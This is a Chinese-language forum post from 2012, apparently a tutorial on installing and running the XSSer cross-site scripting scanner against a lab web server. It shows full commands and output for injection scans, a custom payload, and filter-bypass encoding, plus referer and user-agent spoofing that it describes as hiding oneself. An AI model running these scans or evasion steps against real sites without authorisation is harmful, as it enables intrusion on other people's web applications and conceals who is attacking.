切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
255 XSS扫描:XSSER[复制链接]
发表于 2012-9-11 23:52:53 | 显示全部楼层 |!read_mode!

介绍:宇宙第一FUZZ XSS工具

安装:
  1. root@Dis9Team:/pen/xss# apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip

  2. root@Dis9Team:/pen/xss# svn checkout svn://svn.code.sf.net/p/xsser/code/trunk xsser

  3. root@Dis9Team:/pen/xss# wget http://sourceforge.net/projects/xsser/files/xsser_1.6-1.tar.gz/download
  4. root@Dis9Team:/pen/xss# tar xf download

  5. root@Dis9Team:/pen/xss# cd xsser-public/
  6. root@Dis9Team:/pen/xss/xsser-public# apt-get install python-setuptools
  7. root@Dis9Team:/pen/xss/xsser-public# python setup.py install
  8. root@Dis9Team:/pen/xss/xsser-public# ./xsser
  9. ===========================================================================

  10. XSSer v1.6 (beta): "Grey Swarm!" - 2011/2012 - (GPLv3.0) -> by psy

  11. Cross Site "Scripter" is an automatic -framework- to detect, exploit and
  12. report XSS vulnerabilities in web-based applications.

  13. ===========================================================================
  14.                                        \ \                           %
  15. Project site:                           \ \     LulZzzz!        %  
  16. http://xsser.sf.net                      \_\                      %   
  17.                                       \ ( @.@)         Bbzzzzz!      %  
  18. IRC:                                   \== < ==                  %       irc.freenode.net -> #xsser             / \_         ==       %        
  19.                                        | _         ====  %    %         
  20. Mailing list:                       (')\  \       ====%=              
  21. xsser-users@lists.sf.net               /          ======                 

  22. ===========================================================================

  23. For HELP use -h or --help

  24. For GTK interface use --gtk

  25. =======================================================

  26. root@Dis9Team:/pen/xss/xsser-public#
复制代码
扫描一个连接

扫SERVER的:


  1. root@Dis9Team:/pen/xss/xsser-public# ./xsser -u "http://5.5.5.4/pen/news.php?id=1"
  2. ===========================================================================

  3. XSSer v1.6 (beta): "Grey Swarm!" - 2011/2012 - (GPLv3.0) -> by psy

  4. ===========================================================================
  5. Testing [XSS from URL] injections... looks like your target is good defined ;)
  6. ===========================================================================

  7. HEAD alive check for the target: (http://5.5.5.4/pen/news.php?id=1) is OK(200) [AIMED]

  8. ===========================================================================
  9. Target: http://5.5.5.4/pen/news.php?id=1 --> 2012-08-23 06:39:36.589698
  10. ===========================================================================

  11. ---------------------------------------------
  12. [-] Hashing: 49477d61290259502a3bad3efb88cc5d
  13. [+] Trying: http://5.5.5.4/pen/news.php?id=1/">49477d61290259502a3bad3efb88cc5d
  14. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  15. [+] Checking: url attack with ">PAYLOAD... ok

  16. ===========================================================================

  17. Mosquito(s) landed!

  18. ===========================================================================
  19. [*] Final Results:
  20. ===========================================================================

  21. - Injections: 1
  22. - Failed: 0
  23. - Sucessfull: 1
  24. - Accur: 100 %

  25. ===========================================================================
  26. [*] List of possible XSS injections:
  27. ===========================================================================

  28. [I] Target: http://5.5.5.4/pen/news.php?id=1
  29. [+] Injection: http://5.5.5.4/pen/news.php?id=1/">49477d61290259502a3bad3efb88cc5d
  30. [-] Method: xss
  31. [-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  32. --------------------------------------------------

  33. root@Dis9Team:/pen/xss/xsser-public#
复制代码
测试一下:


  1. root@Dis9Team:/var/www# cat index.html
  2. THIS is Xss!
  3. root@Dis9Team:/var/www# /etc/init.d/apache2 start
  4. * Starting web server apache2                                                                                       [ OK ]
  5. root@Dis9Team:/var/www# ifconfig | grep inet
  6.           inet addr:5.5.5.3  Bcast:5.5.5.255  Mask:255.255.255.0
  7.           inet6 addr: fe80::a00:27ff:fe48:7855/64 Scope:Link
  8.           inet addr:127.0.0.1  Mask:255.0.0.0
  9.           inet6 addr: ::1/128 Scope:Host
复制代码


隐藏自己:用:–referer “http://baidu.com
例如:

  1. root@Dis9Team:/pen/xss/xsser-public# ./xsser -u "http://5.5.5.4/pen/news.php?id=1" --referer "http://baidu.com"
复制代码
扫过限制,使用编码检测:
  1. root@Dis9Team:/pen/xss/xsser-public# ./xsser -u "http://5.5.5.4/pen/news.php?id=1" --auto --Cem "Hex,Str,Hex"
复制代码


自定义payload关于payload 这里看http://fuzzexp.org/u/0day/?p=14
  1. root@Dis9Team:/pen/xss/xsser-public# ./xsser -u "http://5.5.5.4/pen/news.php?id=1" --payload "<A HREF=”http://3w.org”>XSS</A>"
复制代码
使用列表列表写在1.txt里面,你网址
  1. # ./xss-i "1.txt"
复制代码
一个完整的测试
  1. root@Dis9Team:/pen/xss/xsser-public# ./xsser -u http://5.5.5.4/pen/news.php?id=1 -s --user-agent Googlebot  --threads 5 --timeout 30 --retries 1 --delay 0 --auto
复制代码
保存结果用 –xml 1.xml 经常出错 在命令的最后面加个 > 1.txt 例如:
root@Dis9Team:/pen/xss/xsser-public# ./xsser -u http://5.5.5.4/pen/news.php?id=1 -s –user-agent Googlebot –threads 5 –timeout 30 –retries 1 –delay 0 –auto > 1.txt
root@Dis9Team:/pen/xss/xsser-public# gedit 1.txt界面模式

  1. root@Dis9Team:/pen/xss/xsser-public# ./xsser --gtk
复制代码






附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 05:22

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部